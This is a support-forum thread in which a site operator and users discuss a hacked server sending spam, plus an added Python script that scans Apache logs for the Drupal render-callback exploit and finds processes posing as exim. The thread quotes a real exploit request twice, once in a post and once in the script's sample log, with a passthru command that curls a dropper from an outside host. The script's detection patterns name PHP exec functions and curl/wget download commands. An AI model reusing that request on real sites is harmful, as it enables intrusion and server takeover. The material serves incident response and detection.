Welcome to the Cumulus Support forum.
Latest Cumulus MX V4 release 4.0.0 (build 4022) - 11 May 2024
Latest Cumulus MX V3 release 3.28.6 (build 3283) - 21 March 2024
Legacy Cumulus 1 release 1.9.4 (build 1099) - 28 November 2014
(a patch is available for 1.9.4 build 1099 that extends the date range of drop-down menus to 2030)
Download the Software (Cumulus MX / Cumulus 1 and other related items) from the Wiki
Site going down.
- ConligWX
- Posts: 1645
- Joined: Mon 19 May 2014 10:45 pm
- Weather Station: Davis vPro2+ w/DFARS + AirLink
- Operating System: Ubuntu 24.04 LTS
- Location: Bangor, NI
- Contact:
Re: Site going down.
Let's hope you've fixed it so you and the wife can get on with the holiday.
Regards Simon
https://www.conligwx.org - @conligwx
Davis Vantage Pro2 Plus with Daytime FARS • WeatherLink Live • Davis AirLink • PurpleAir • CumulusMX v4.0.0
-
- Posts: 512
- Joined: Mon 28 Nov 2011 2:13 am
- Weather Station: Davis VP2/ WLL with DFARS
- Operating System: RPi Raspbian (Buster)
- Location: Ferny Grove, Brisbane, Australia
- Contact:
Re: Site going down.
It's good to hear you have been making progress and thanks for trying to resolve this. It's a horrible shame how low some people are in what they do to cause trouble. Hopefully you have fixed the issue and you do enjoy your holiday.
-
- Posts: 225
- Joined: Sat 27 Aug 2016 12:11 am
- Weather Station: Davis vantage pro 2
- Operating System: Debian
- Location: Wickliffe, Ohio
- Contact:
Re: Site going down.
Any chance that you can give us a little insight on the script they used to keep it running, or what one should look for.
May be helpful for others to know what to do if they have this problem to stop these script kiddies.
Thanks Steve for your hard work getting this problem resolved while on holiday.
Jeff
My Site http://wickliffeweather.com/
WeatherUnderground https://www.wunderground.com/personal-w ... KOHYOUNG21
- steve
- Cumulus Author
- Posts: 26701
- Joined: Mon 02 Jun 2008 6:49 pm
- Weather Station: None
- Operating System: None
- Location: Vienne, France
- Contact:
Re: Site going down.
I don't really have much to offer, I just deleted installations of things like Wordpress and Drupal which hadn't been kept up to date. This entry (and others similar) in the apache log looked suspicious (thanks go to Ken for suggesting that a suspicious POST was something to look for) and from googling it appeared to be related to a Drupal vulnerability;
85.126.200.23 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/.htaccess+htaccessx;curl+-o+sites/default/api.php+'http://saint-laurent-gorre.fr/_inc/_phpThumb/demit.aff' HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"
I realised that I had been wrong about the spam not coming from the server when I had turned off all the legitimate sources of email and there were still smtp connections being made. I also had a number of (supposedly) exim processes running, and I don't have exim installed. Some malware disguises itself as exim, amongst other things.
It makes you realise that Linux is no more secure than Windows unless you really know what you're doing and keep on top of vulnerability notices and keep everything up to date. Although I believe this incident was my fault for not keeping things up to date, I do now regret allowing some users to install things like PHPBB and Wordpress.
Steve
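The log line Steve quotes matches the widely published exploit pattern for the Drupal form-API remote code execution flaw patched in March 2018 (SA-CORE-2018-002, CVE-2018-7600): form keys such as `#post_render` are smuggled into the password-reset form via the `name[...]` parameter, a PHP exec function (`passthru`) is supplied as the render callback, and the `#markup` value is the shell command it runs (here: move `.htaccess` aside and `curl` a dropper into `sites/default/api.php`). The script below is an added example by the editor, not code from Steve, Ken or the Cumulus project. It does the two checks described in the post: it parses Apache combined-format lines, URL-decodes the request target and flags this pattern (the first sample line is the one quoted above; the two benign lines and the process list are constructed), and it reports processes whose name is a trusted daemon but whose binary is not one of that daemon's known paths, which is how "exim" processes on a box without exim show up. The trusted-path table and the `SAMPLE_*` data are assumptions for the demo.

```python
import os
import re
from urllib.parse import unquote_plus

# Apache "combined" log format, the layout of the line quoted in the post above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Drupal form-API render keys injected through a form parameter, with a PHP
# command-execution function supplied as the callback (after URL decoding).
RENDER_CALLBACK_RE = re.compile(
    r"\[#(?:post_render|pre_render|lazy_builder|access_callback)\]\[\]="
    r"(?:passthru|system|exec|shell_exec|popen|proc_open)"
)
# Dropper behaviour in the payload: fetch-and-write, touching .htaccess, chaining.
DROPPER_RE = re.compile(r"\b(?:curl|wget)\b.*\s-[oO]\s|\.htaccess|;|&&|\|\|")


def parse_line(line):
    """Parse one combined-format line; returns None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    # unquote_plus turns %23 into '#' and '+' into spaces, as the server does.
    entry["decoded"] = unquote_plus(entry["target"])
    return entry


def classify(entry):
    """Return the list of reasons an entry is suspicious (empty = nothing seen)."""
    reasons = []
    dec = entry["decoded"]
    if RENDER_CALLBACK_RE.search(dec):
        reasons.append("render callback set to a PHP exec function")
    if "#markup" in dec and DROPPER_RE.search(dec):
        reasons.append("shell dropper in #markup payload")
    if reasons and entry["method"] == "POST" and entry["status"] == 200:
        reasons.append("server answered 200: treat as possibly successful")
    return reasons


def scan(lines):
    """Return [(ip, decoded target, reasons)] for every flagged line."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["decoded"], reasons))
    return hits


def find_impostors(procs, trusted_exe):
    """procs: [(pid, comm, exe)] as read from /proc/<pid>/comm and /proc/<pid>/exe.
    trusted_exe: {comm: set of legitimate binary paths}. A process that uses a
    trusted daemon's name but runs from some other binary is reported; an empty
    set (daemon not installed) means every process of that name is reported."""
    return [(pid, comm, exe) for pid, comm, exe in procs
            if comm in trusted_exe and exe not in trusted_exe[comm]]


def snapshot_procs():
    """Linux only: (pid, comm, exe) for every readable process (exe of other
    users' processes needs root). comm is truncated to 15 chars by the kernel."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue
        procs.append((int(pid), comm, exe))
    return procs


# Constructed sample: line 1 is the entry quoted in the post; lines 2 and 3 are
# benign requests made up for contrast (documentation address 203.0.113.9).
SAMPLE_LOG = [
    '85.126.200.23 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/.htaccess+htaccessx;curl+-o+sites/default/api.php+\'http://saint-laurent-gorre.fr/_inc/_phpThumb/demit.aff\' HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"',
    '203.0.113.9 - - [08/Oct/2018:04:50:02 +0200] "GET /index.php?q=node/12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [08/Oct/2018:04:51:10 +0200] "POST /?q=user/password HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]
# Constructed process table: two "exim" processes on a host where exim is not
# installed (so its trusted path set is empty), plus a legitimate apache2.
SAMPLE_PROCS = [
    (1234, "exim", "/tmp/.x/exim"),
    (1235, "exim", "/usr/sbin/exim4 (deleted)"),
    (1300, "apache2", "/usr/sbin/apache2"),
]
TRUSTED = {"exim": set(), "apache2": {"/usr/sbin/apache2"}}  # assumed for the demo

if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(ip, target[:70] + "...", reasons)
    for pid, comm, exe in find_impostors(SAMPLE_PROCS, TRUSTED):
        print("impostor:", pid, comm, exe)
    # On a real box: find_impostors(snapshot_procs(), {"exim": {"/usr/sbin/exim4"}})
```

Run it over the real log with `scan(open("/var/log/apache2/access.log"))`; the regexes work on the decoded target, so `%23`-encoded and literal `#` variants are both caught. A 200 on such a POST is only a hint that the callback ran (the post's own line returned 200 and the server was indeed compromised); confirm by looking for the dropped file (`sites/default/api.php` here) and the renamed `.htaccess`.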
-
- Posts: 3396
- Joined: Wed 06 May 2009 6:29 pm
- Weather Station: Davis VP2 with Daytime FARS
- Operating System: Windows XP SP3
- Location: Cheadle Hulme, Cheshire, England
- Contact:
Re: Site going down.
Steve, thanks for the update. Way over my head I’m afraid. Does this now mean the malware is no more and the hosting company have removed the threat of closure?
- steve
- Cumulus Author
- Posts: 26701
- Joined: Mon 02 Jun 2008 6:49 pm
- Weather Station: None
- Operating System: None
- Location: Vienne, France
- Contact:
Re: Site going down.
I believe the malware is no more, although there is still a slight oddity to be explained, but this apparently is not doing any harm. Hetzner are going to review after two days. After which I will re-enable the outgoing smtp port so that mail from the forum will start working again, and hopefully the server will eventually stop being flagged as a risk - I’ve noticed in the mail logs that some destinations are refusing mail from us.
Steve
-
- Posts: 3396
- Joined: Wed 06 May 2009 6:29 pm
- Weather Station: Davis VP2 with Daytime FARS
- Operating System: Windows XP SP3
- Location: Cheadle Hulme, Cheshire, England
- Contact:
Re: Site going down.
Thanks Steve. I’m breathing a huge sigh of relief. Things looked very bleak over the weekend but you’ve done a great job in sorting things out aided by Ken.
- ConligWX
- Posts: 1645
- Joined: Mon 19 May 2014 10:45 pm
- Weather Station: Davis vPro2+ w/DFARS + AirLink
- Operating System: Ubuntu 24.04 LTS
- Location: Bangor, NI
- Contact:
Re: Site going down.
It sounds more like a PHP injection vulnerability than Linux itself being hacked. PHP CMSs are plagued with security holes, and only by updating them when updates are released can you try to secure a site.
Steve, on that note you would be advised to update phpBB. You're running a version that needs updating.
pm sent...
Regards Simon
https://www.conligwx.org - @conligwx
Davis Vantage Pro2 Plus with Daytime FARS • WeatherLink Live • Davis AirLink • PurpleAir • CumulusMX v4.0.0
-
- Posts: 3396
- Joined: Wed 06 May 2009 6:29 pm
- Weather Station: Davis VP2 with Daytime FARS
- Operating System: Windows XP SP3
- Location: Cheadle Hulme, Cheshire, England
- Contact:
Re: Site going down.
Not sure if this is related or not, but when I log into my account with FileZilla it notifies me the certificate has expired. Is that a potential area of concern?
- steve
- Cumulus Author
- Posts: 26701
- Joined: Mon 02 Jun 2008 6:49 pm
- Weather Station: None
- Operating System: None
- Location: Vienne, France
- Contact:
Re: Site going down.
I created a dummy certificate when I enabled secure ftp on the server when testing the code I added to Cumulus MX. Filezilla will try to use secure ftp in preference and will get the dummy certificate. I suppose I should really disable secure ftp on the server, I get asked about this regularly. The last time I was asked, I forgot how it was supposed to work, and broke the server for a short time trying to fix something that didn’t need fixing!
At some point I may look into getting a proper certificate, now that they can be had for free.
(Short answer: no )
Steve
-
- Posts: 3396
- Joined: Wed 06 May 2009 6:29 pm
- Weather Station: Davis VP2 with Daytime FARS
- Operating System: Windows XP SP3
- Location: Cheadle Hulme, Cheshire, England
- Contact:
Re: Site going down.
Thanks Steve. Not a major issue for me but given recent events thought it worth asking. I imagine you're feeling a lot better now! Time for a beer or two!
- steve
- Cumulus Author
- Posts: 26701
- Joined: Mon 02 Jun 2008 6:49 pm
- Weather Station: None
- Operating System: None
- Location: Vienne, France
- Contact:
Re: Site going down.
The spam has started again. I have blocked outgoing traffic on port 25 and will investigate when I get home, I've had enough of this for now.
I strongly advise anyone whose web site is on this server to start making alternative arrangements. I will refund any payments made, pro-rata, on request to steve@nybbles.co.uk
Steve
- saratogaWX
- Posts: 1211
- Joined: Wed 06 May 2009 5:02 am
- Weather Station: Davis Vantage Pro Plus
- Operating System: Windows 10 Professional
- Location: Saratoga, CA, USA
- Contact:
Re: Site going down.
Ouch. I’ll be glad to analyze the logs again, Steve.
Best regards,
Ken